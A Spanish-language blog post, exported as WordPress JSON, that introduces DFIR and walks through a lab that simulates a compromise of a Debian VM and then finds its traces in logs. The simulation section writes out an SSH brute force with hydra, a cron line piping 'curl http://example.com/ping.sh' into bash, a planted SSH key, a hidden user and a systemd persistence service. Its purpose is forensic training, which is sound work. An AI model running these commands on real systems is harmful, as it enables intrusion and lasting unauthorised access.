{"id":1976,"date":"2026-03-10T07:00:00","date_gmt":"2026-03-10T10:00:00","guid":{"rendered":"https:\/\/www.nerdadas.com\/blog\/?p=1976"},"modified":"2026-03-14T13:59:21","modified_gmt":"2026-03-14T16:59:21","slug":"dfir-analisis-forense","status":"publish","type":"post","link":"https:\/\/www.nerdadas.com\/blog\/dfir-analisis-forense\/","title":{"rendered":"DFIR &#8211; An\u00e1lisis Forense"},"content":{"rendered":"\n<p>Seguro viste un mont\u00f3n de pel\u00edculas donde el hacker rompe todo, ve las c\u00e1maras de toda la ciudad, destruye un sat\u00e9lite en \u00f3rbita y frena un ataque nuclear; todo desde su habitaci\u00f3n en el z\u00f3tano de la casa de sus padres&#8230; <strong>Y te habr\u00e1s preguntado&#8230; Es as\u00ed?, no lo pueden detectar?. <\/strong><\/p>\n\n\n\n<p>Bueno, esa no es la pregunta dificil. La pregunta dificil viene despu\u00e9s que sab\u00e9s que lo detectaron y que te hacke\u00f3: <\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<h2 class=\"wp-block-heading\"><strong>C\u00f3mo lo hizo?.<\/strong><\/h2>\n<\/blockquote>\n\n\n\n<p>Para responder esta y otras preguntas relacionadas existe <strong>DFIR<\/strong>, <strong>la rama de la ciberseguridad que se encarga del An\u00e1lisis Forense!<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Qu\u00e9 es DFIR?<\/h2>\n\n\n\n<p>En los \u00faltimos a\u00f1os, el t\u00e9rmino <strong>DFIR<\/strong> se volvi\u00f3 cada vez m\u00e1s com\u00fan dentro del mundo de la ciberseguridad. A medida que los ataques inform\u00e1ticos se vuelven m\u00e1s sofisticados y frecuentes, las organizaciones necesitan no solo <strong>prevenir intrusiones<\/strong>, sino tambi\u00e9n <strong>investigarlas cuando ocurren<\/strong>.<br \/>Ah\u00ed es donde entra en juego DFIR.<\/p>\n\n\n\n<p><strong>DFIR<\/strong> combina dos disciplinas fundamentales: <strong>la respuesta a incidentes de seguridad<\/strong> y <strong>el an\u00e1lisis forense digital<\/strong>. Su objetivo es entender qu\u00e9 ocurri\u00f3 durante un ataque, c\u00f3mo ocurri\u00f3, qu\u00e9 impacto tuvo y c\u00f3mo evitar que vuelva a suceder.<br \/><strong>DFIR<\/strong> no es una sino dos disciplinas unidas:<strong> Digital Forensic <\/strong>and<strong> Incidente Response<\/strong> y tienen como objetivo detectar y responder ante incidentes de Ciberseguridad.<\/p>\n\n\n\n<p><strong>Incident Response<\/strong> <strong>(IR)<\/strong> tiene como objetivo <strong>detectar, contener y erradicar un ataque en curso<\/strong> y se har\u00e1 preguntas como:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u00bfQu\u00e9 est\u00e1 pasando?<\/li>\n\n\n\n<li>\u00bfEl atacante sigue adentro?<\/li>\n\n\n\n<li>\u00bfC\u00f3mo lo frenamos?<\/li>\n\n\n\n<li>\u00bfQu\u00e9 sistemas est\u00e1n comprometidos?<\/li>\n<\/ul>\n\n\n\n<p>La parte de tu empresa o departamento que ejecute la respuesta ante incidentes conocer\u00e1 bien la infraestructura completa de la red. Normalmente guiados por el <strong>CISO<\/strong> de la empresa o el J<strong>efe de infraestructura y tecnolog\u00eda. <\/strong><br \/>Suelen tener Playbooks para cada ataque o situaci\u00f3n. Los playbooks son manuales o un conjunto de procedimientos y herramientas de como actuar o desplegar en situaciones espec\u00edficas. Es normal tener un playbook para Ramsomware, otro para intrusi\u00f3n detectada, etc.<\/p>\n\n\n\n<p><strong>Digital Forensics (DF) <\/strong>es la investigaci\u00f3n t\u00e9cnica posterior y responde otras tantas preguntas como:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u00bfC\u00f3mo entraron?<\/li>\n\n\n\n<li>\u00bfQu\u00e9 vulnerabilidad explotaron?<\/li>\n\n\n\n<li>\u00bfQu\u00e9 hicieron dentro del sistema?<\/li>\n\n\n\n<li>\u00bfQu\u00e9 datos tocaron o robaron?<\/li>\n\n\n\n<li>\u00bfCu\u00e1nto tiempo estuvieron?<\/li>\n<\/ul>\n\n\n\n<p>Ac\u00e1 el objetivo es otro: <strong>Reconstruir el ataque con evidencia t\u00e9cnica<\/strong>. <\/p>\n\n\n\n<p>Ambos son desaf\u00edos tecnol\u00f3gicos y requieren mucho conocimiento.<\/p>\n\n\n\n<p>En el medio ten\u00e9s un mont\u00f3n de \u00abDisciplinas\u00bb o \u00abT\u00e9cnicas\u00bb y equipos asociados para poder lograr estos objetivos. Seguro viste muchos de estos items en WAZUH como Threat Hunting, Malware Detection, etc.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/nist.png\"><img loading=\"lazy\" decoding=\"async\" width=\"952\" height=\"941\" src=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/nist.png\" alt=\"\" class=\"wp-image-1979\" srcset=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/nist.png 952w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/nist-300x297.png 300w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/nist-768x759.png 768w\" sizes=\"auto, (max-width: 952px) 100vw, 952px\" \/><\/a><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">DFIR Como Framework<\/h2>\n\n\n\n<p>La mayor\u00eda de los equipos DFIR siguen modelos estructurados de respuesta a incidentes.<\/p>\n\n\n\n<p>Uno de los m\u00e1s conocidos es el ciclo de respuesta(y uno de los marcos normativos m\u00e1s rompe pelotas de implementar XD) del <strong>National Institute of Standards and Technology (NIST)<\/strong>, que define cuatro fases principales:<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">1. Preparaci\u00f3n<\/h2>\n\n\n\n<p>Antes de que ocurra un incidente, las organizaciones deben preparar:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>herramientas de monitoreo<\/li>\n\n\n\n<li>procedimientos de respuesta<\/li>\n\n\n\n<li>planes de contingencia<\/li>\n\n\n\n<li>backups<\/li>\n\n\n\n<li>personal capacitado(la parte m\u00e1s dura quiz\u00e1s)<\/li>\n<\/ul>\n\n\n\n<p>La preparaci\u00f3n es cr\u00edtica, porque <strong>una respuesta improvisada suele agravar los incidentes<\/strong>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">2. Detecci\u00f3n y an\u00e1lisis<\/h2>\n\n\n\n<p>En esta fase se identifica la actividad sospechosa y se confirma si se trata de un incidente real o un falso positivo.<\/p>\n\n\n\n<p>Las fuentes de detecci\u00f3n suelen ser:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>sistemas de monitoreo<\/li>\n\n\n\n<li>SIEM<\/li>\n\n\n\n<li>logs de servidores<\/li>\n\n\n\n<li>alertas de antivirus o EDR<\/li>\n\n\n\n<li>reportes de usuarios<\/li>\n<\/ul>\n\n\n\n<p>Una vez detectado el incidente, comienza el an\u00e1lisis inicial para entender su alcance.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">3. Contenci\u00f3n, erradicaci\u00f3n y recuperaci\u00f3n<\/h2>\n\n\n\n<p>Ac\u00e1 se ejecutan las acciones para detener el ataque.<\/p>\n\n\n\n<p>Las tareas pueden incluir:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>aislar sistemas comprometidos<\/li>\n\n\n\n<li>bloquear direcciones IP maliciosas<\/li>\n\n\n\n<li>eliminar malware<\/li>\n\n\n\n<li>cerrar vulnerabilidades<\/li>\n\n\n\n<li>restaurar sistemas desde backups<\/li>\n<\/ul>\n\n\n\n<p>El objetivo es <strong>recuperar la operaci\u00f3n normal lo antes posible<\/strong>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">4. Lecciones aprendidas<\/h2>\n\n\n\n<p>Despu\u00e9s del incidente se realiza un an\u00e1lisis completo para entender:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>qu\u00e9 fall\u00f3<\/li>\n\n\n\n<li>qu\u00e9 controles faltaban<\/li>\n\n\n\n<li>qu\u00e9 mejoras implementar<\/li>\n<\/ul>\n\n\n\n<p>Esta fase es fundamental para fortalecer la seguridad futura.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Qu\u00e9 analiza un investigador DFIR<\/h1>\n\n\n\n<p>Durante una investigaci\u00f3n, los analistas o la gente de TI examinan m\u00faltiples fuentes de evidencia digital que seguro no escapan a tu laburo diario.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Logs del sistema<\/h3>\n\n\n\n<p>Archivos de registro que muestran eventos importantes, como:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>accesos al sistema<\/li>\n\n\n\n<li>ejecuci\u00f3n de comandos<\/li>\n\n\n\n<li>instalaci\u00f3n de software<\/li>\n\n\n\n<li>conexiones de red<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Sistemas de archivos<\/h3>\n\n\n\n<p>Se analizan:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>archivos creados o modificados<\/li>\n\n\n\n<li>binarios sospechosos<\/li>\n\n\n\n<li>scripts maliciosos<\/li>\n\n\n\n<li>artefactos de persistencia<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Memoria RAM<\/h3>\n\n\n\n<p>Este es un poco m\u00e1s rebuscado pero el an\u00e1lisis de memoria puede revelar:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>procesos maliciosos<\/li>\n\n\n\n<li>conexiones de red activas<\/li>\n\n\n\n<li>credenciales en memoria<\/li>\n\n\n\n<li>malware residente<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Tr\u00e1fico de red<\/h3>\n\n\n\n<p>Para esta parte necesitas un IDS, IPS o un NGFW. Se investiga el tr\u00e1fico para detectar:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>comunicaciones con servidores de comando y control<\/li>\n\n\n\n<li>exfiltraci\u00f3n de datos<\/li>\n\n\n\n<li>movimientos laterales dentro de la red<\/li>\n<\/ul>\n\n\n\n<p>Desde ya que este tipo de analisis es muy t\u00e9cnico y la tenes que tener bastante clara para empezar a investigar pero no es algo de otro mundo. <br \/>Hay herramientas espec\u00edficas para auditor\u00edas forenses. Entre las m\u00e1s conocidas ten\u00e9s:<br \/><strong>an\u00e1lisis forense<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Autopsy<\/li>\n\n\n\n<li>Sleuth Kit<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">an\u00e1lisis de memoria<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Volatility<\/li>\n\n\n\n<li>Rekall<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">an\u00e1lisis de timeline<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Plaso<\/li>\n\n\n\n<li>Timesketch<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">recolecci\u00f3n de artefactos<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Velociraptor<\/li>\n\n\n\n<li>GRR Rapid Response<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">monitoreo y detecci\u00f3n<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Wazuh<\/li>\n\n\n\n<li>SIEMs Pagos! (dos opciones nom\u00e1s: la gratis y las pagas!)<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Laboratorio<\/h2>\n\n\n\n<p>Pens\u00e9 mucho en como encarar una pr\u00e1ctica clara de <strong>DFIR<\/strong>. Si entras a cualquier sitio a jugar <strong>CTF<\/strong> vas a encontrar un mont\u00f3n de VMs de Ofensiva pero pocas de Defensiva. Sabiendo esto me propuse hacer un ataque a una <strong>VM<\/strong> en <strong>GNS3<\/strong>, en este caso un Debian, y despu\u00e9s hacer el an\u00e1lisis de logs logs correspondientes. Esto es lo que sali\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/escenario.png\"><img loading=\"lazy\" decoding=\"async\" width=\"763\" height=\"355\" src=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/escenario.png\" alt=\"\" class=\"wp-image-1982\" srcset=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/escenario.png 763w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/escenario-300x140.png 300w\" sizes=\"auto, (max-width: 763px) 100vw, 763px\" \/><\/a><\/figure>\n\n\n\n<p>El escenario est\u00e1 vez es super minimalista!!<\/p>\n\n\n\n<p>Nuestro Debian va a correr un server web (apache2) y un server ssh(openssh). Y luego vamos a realizar unos ataques. <strong>La ip de nuestro server Debian es: 192.168.122.252<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#Configuramos nuestro debian\nsudo apt update &amp;&amp; sudo apt install openssh-server apache2 -y\n#Agregamos un usuario\nsudo adduser alumno\n#le vamos a poner una password sencilla del tipo: 123456\n#Ahora vamos a darle al usuario alumno permisos sudo\nsudo usermod -aG sudo alumno<\/code><\/pre>\n\n\n\n<p>Excelente. Ya tenemos el entorno vulnerable!. Esto no es un ataque real solo vamos a tratar de escribir los logs de nuestro servidor para que en un an\u00e1lisis parezca un ataque real.<\/p>\n\n\n\n<p>Voy a tratar de ir r\u00e1pido as\u00ed que pondr\u00e9 en los comentarios lo que vamos a hacer.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#Ataque de fuerza bruta al ssh\nhydra -l alumno -P \/home\/usuario\/passwords\/rockyou.txt ssh:\/\/192.168.122.252<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/hydra.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"292\" src=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/hydra-1024x292.png\" alt=\"\" class=\"wp-image-1986\" srcset=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/hydra-1024x292.png 1024w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/hydra-300x86.png 300w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/hydra-768x219.png 768w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/hydra.png 1031w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<p>Listo, acabamos de llenar los logs de acceso.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#Nos conectamos por ssh y dejamos unos logs por todos lados\nssh alumno@192.168.122.252\n\n#Simulamos la descarga de alg\u00fan exploit\nwget http:\/\/example.com\/tool.sh\n\n#Vamos a dejar un virus persistente\ncrontab -e\n\n#y escribimos\n*\/5 * * * * curl http:\/\/example.com\/ping.sh | bash\n\n#Editamos y ponemos nuestra clave para el acceso perpetuo\nsudo nano ~\/.ssh\/authorized_keys\n\n#Simulamos una escalada de privilegios\nsudo usermod -aG sudo alumno\nsudo -i\n\n#Vamos a dejar un archivo sospechoso\nmkdir \/tmp\/.cache\nnano \/tmp\/.cache\/miner.sh\n\n#cargamos esto en nuestro archivo\nwhile true\ndo\necho mining...\nsleep 10\ndone\nchmod +x \/tmp\/.cache\/miner.sh\n\n#Vamos a crear un usuario oculto por si nos descubren\nsudo useradd backupsvc\nsudo passwd backupsvc\n\n#Vamos a instalar un servicio persistente\nsudo nano \/etc\/systemd\/system\/update.service\n\n#contenido\n&#91;Unit]\nDescription=System Update\n\n&#91;Service]\nExecStart=\/tmp\/.cache\/miner.sh\n\n&#91;Install]\nWantedBy=multi-user.target\n\n#Dejamos el servicio andando\nsystemctl enable update<\/code><\/pre>\n\n\n\n<p><strong>Bueno, ya tenemos un equipo comprometido<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>brute force SSH<\/li>\n\n\n\n<li>login exitoso<\/li>\n\n\n\n<li>sudo escalation<\/li>\n\n\n\n<li>cron persistente<\/li>\n\n\n\n<li>servicio systemd<\/li>\n\n\n\n<li>malware en \/tmp<\/li>\n\n\n\n<li>usuario oculto<\/li>\n<\/ul>\n\n\n\n<p>Ahora vamos a aplicar DFIR, pero antes de tocar nada debemos asegurarnos de mantener la evidencia tal cu\u00e1l la encontramos.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Contenci\u00f3n inicial (antes del forense)<\/h1>\n\n\n\n<p>Primero hay que evitar que el atacante siga operando.<\/p>\n\n\n\n<p>Opciones:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Desconectar el servidor de la red<\/strong><\/li>\n\n\n\n<li>o <strong>bloquear salida a internet<\/strong><\/li>\n\n\n\n<li>o <strong>moverlo a una VLAN de cuarentena<\/strong><\/li>\n<\/ul>\n\n\n\n<p>Pero <strong>NO lo apagues todav\u00eda<\/strong> si quer\u00e9s an\u00e1lisis completo. La RAM puede tener evidencia.<\/p>\n\n\n\n<p>Si el incidente es grave:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>snapshot del VM<\/li>\n\n\n\n<li>snapshot del disco<\/li>\n\n\n\n<li>captura de RAM<\/li>\n<\/ul>\n\n\n\n<p>Herramientas que pod\u00e9s usar:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>LiME<\/code> (Linux Memory Extractor)<\/li>\n\n\n\n<li><code>AVML<\/code><\/li>\n\n\n\n<li><code>dd<\/code> o <code>dcfldd<\/code> para discos<\/li>\n<\/ul>\n\n\n\n<p>Ejemplo:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>dd if=\/dev\/sda of=\/mnt\/forensics\/disk_image.dd bs=4M<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">Preservaci\u00f3n de evidencia o Cadena de Custodia<\/h1>\n\n\n\n<p>Hay que <strong>copiar logs y archivos antes de que roten o se pierdan<\/strong>.<\/p>\n\n\n\n<p>Directorio t\u00edpico que copio entero:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/var\/log<br \/>\/home<br \/>\/root<br \/>\/etc<br \/>\/tmp<br \/>\/var\/tmp<br \/>\/var\/spool<\/code><\/pre>\n\n\n\n<p>Tambi\u00e9n:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/var\/lib<br \/>\/usr\/local<\/code><\/pre>\n\n\n\n<p>Ejemplo:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>tar czf logs.tar.gz \/var\/log<\/code><\/pre>\n\n\n\n<p>Empezamos con DFIR en nuestro equipo de pruebas!.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Analizando<\/h2>\n\n\n\n<p><strong>Detectar brute force SSH<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#intentos fallidos:\njournalctl -t sshd | grep \"Failed password\"\n\n#contar intentos:\njournalctl -t sshd | grep \"Failed password\" | wc -l\n\n#IPs atacantes:\njournalctl -t sshd | grep \"Failed password\" | awk '{print $11}' | sort | uniq -c<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/ataque.png\"><img loading=\"lazy\" decoding=\"async\" width=\"898\" height=\"518\" src=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/ataque.png\" alt=\"\" class=\"wp-image-1990\" srcset=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/ataque.png 898w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/ataque-300x173.png 300w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/ataque-768x443.png 768w\" sizes=\"auto, (max-width: 898px) 100vw, 898px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/ip.png\"><img loading=\"lazy\" decoding=\"async\" width=\"869\" height=\"104\" src=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/ip.png\" alt=\"\" class=\"wp-image-1991\" srcset=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/ip.png 869w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/ip-300x36.png 300w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/ip-768x92.png 768w\" sizes=\"auto, (max-width: 869px) 100vw, 869px\" \/><\/a><\/figure>\n\n\n\n<p><strong>Detectar login exitoso<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>grep \"Accepted password\" \/var\/log\/auth.log<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/sesinoes.png\"><img loading=\"lazy\" decoding=\"async\" width=\"609\" height=\"157\" src=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/sesinoes.png\" alt=\"\" class=\"wp-image-1992\" srcset=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/sesinoes.png 609w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/sesinoes-300x77.png 300w\" sizes=\"auto, (max-width: 609px) 100vw, 609px\" \/><\/a><\/figure>\n\n\n\n<p><strong>Ver sesiones<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>last<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/sesinoes-1.png\"><img loading=\"lazy\" decoding=\"async\" width=\"609\" height=\"157\" src=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/sesinoes-1.png\" alt=\"\" class=\"wp-image-1994\" srcset=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/sesinoes-1.png 609w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/sesinoes-1-300x77.png 300w\" sizes=\"auto, (max-width: 609px) 100vw, 609px\" \/><\/a><\/figure>\n\n\n\n<p>En este punto ya sabemos como entr\u00f3 y desde que ip. Ahora se nos va a hacer m\u00e1s sencillo buscar m\u00e1s info.<\/p>\n\n\n\n<p><strong>Ver uso de sudo<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>journalctl -t sshd | grep sudo<\/code><\/pre>\n\n\n\n<p><strong>Buscar persistencia<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>crontab -l<\/code><\/pre>\n\n\n\n<p><strong>Buscar servicios sospechosos<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>systemctl list-unit-files | grep enabled<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/servicio.png\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"602\" src=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/servicio.png\" alt=\"\" class=\"wp-image-1996\" srcset=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/servicio.png 900w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/servicio-300x201.png 300w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/servicio-768x514.png 768w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a><\/figure>\n\n\n\n<p><strong>Buscar malware en tmp<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>find \/tmp -type f -executable<\/code><\/pre>\n\n\n\n<p><strong>Buscar usuarios nuevos<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat \/etc\/passwd<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/image.png\"><img loading=\"lazy\" decoding=\"async\" width=\"511\" height=\"68\" src=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/image.png\" alt=\"\" class=\"wp-image-1997\" srcset=\"https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/image.png 511w, https:\/\/www.nerdadas.com\/blog\/wp-content\/uploads\/2026\/03\/image-300x40.png 300w\" sizes=\"auto, (max-width: 511px) 100vw, 511px\" \/><\/a><\/figure>\n\n\n\n<p>comparar fechas.<\/p>\n\n\n\n<p><strong>Revisar historial<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#Ac\u00e1 est\u00e1 la papa, todos los comandos ejecutados\ncat ~\/.bash_history<\/code><\/pre>\n\n\n\n<p><strong>Revisar procesos<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ps aux<\/code><\/pre>\n\n\n\n<p>Hasta ac\u00e1 todo lo que seguro ya usas en tu trabajo diario. Te dejo un checklist r\u00e1pido que encontr\u00e9 en la red para tener presente.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Checklist r\u00e1pido de compromiso Linux<\/h1>\n\n\n\n<p>Este checklist se usa mucho en incident response.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">sesiones activas<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>w<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">conexiones<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>ss -antp<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">procesos raros<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>ps auxf<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">archivos recientes<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>find \/ -mtime -1<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">SUID sospechosos<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>find \/ -perm -4000<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">cron<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>ls -la \/etc\/cron*<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">C\u00f3mo detectar webshells en Apache<\/h1>\n\n\n\n<p>Y si alguien dej\u00f3 una webshell en tu \/var\/www\/html\/?. Bueno, primero lo primero:<\/p>\n\n\n\n<p>Buscar archivos nuevos:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/var\/www\/html<\/code><\/pre>\n\n\n\n<p>ejemplo:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>find \/var\/www -mtime -1<\/code><\/pre>\n\n\n\n<p>Buscar funciones peligrosas en PHP:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>shell_exec<br \/>system<br \/>exec<br \/>passthru<\/code><\/pre>\n\n\n\n<p>En la web oficial de <strong>SANS<\/strong> encontr\u00e9 este muy pr\u00e1ctico CheatSheet. <br \/><a href=\"https:\/\/assets.contentstack.io\/v3\/assets\/blt36c2e63521272fdc\/blt982ed30203b20003\/5dfbaac458fc4a5aad8eb8e2\/digital-forensics-incident-response-log2timeline-timeline-cheatsheet.pdf\">https:\/\/assets.contentstack.io\/v3\/assets\/blt36c2e63521272fdc\/blt982ed30203b20003\/5dfbaac458fc4a5aad8eb8e2\/digital-forensics-incident-response-log2timeline-timeline-cheatsheet.pdf<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Conclusiones&#8230;<\/h1>\n\n\n\n<p>Este documento no pretende ser exhaustivo sino motivar a buscar un poco m\u00e1s de informaci\u00f3n sobre la pr\u00e1ctica digital forense. Dej\u00e9 de lado muchas herramientas muy copadas pero es mucho para mencionar ac\u00e1. Ojal\u00e1 los empuje a indagar m\u00e1s!.<\/p>\n\n\n\n<p><strong>DFIR<\/strong> representa la evoluci\u00f3n natural de la seguridad inform\u00e1tica frente a amenazas cada vez m\u00e1s complejas. A pesar de que las soluciones en Ciberseguridad vienen cada vez m\u00e1s potentes nada te hace libre de un ataque.<\/p>\n\n\n\n<p>Algo que me gustar\u00eda aclarar es que al detectar un equipo \u00abcomprometido\u00bb y empezar a trabajar en \u00e9l, este equipo deja de ser confiable. Lo conservaremos para aplicar el an\u00e1lisis forense pero ya no puede estar m\u00e1s en producci\u00f3n: <strong>Ha sido comprometido.<\/strong><\/p>\n\n\n\n<p>Mientras que las soluciones tradicionales se enfocan en <strong>prevenir ataques<\/strong>, DFIR se enfoca en <strong>entenderlos, responder a ellos y aprender de cada incidente<\/strong>.<\/p>\n\n\n\n<p>Buscando en internet encontr\u00e9 un repo gigante que me parece que es copado si quer\u00e9s empezar a investigar por estos rumbos.<br \/><a href=\"https:\/\/github.com\/adrianlois\/DFIR-Detection-Engineering?tab=readme-ov-file\">https:\/\/github.com\/adrianlois\/DFIR-Detection-Engineering?tab=readme-ov-file<\/a><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Seguro viste un mont\u00f3n de pel\u00edculas donde el hacker rompe todo, ve las c\u00e1maras de toda la ciudad, destruye un sat\u00e9lite en \u00f3rbita y frena un ataque nuclear; todo 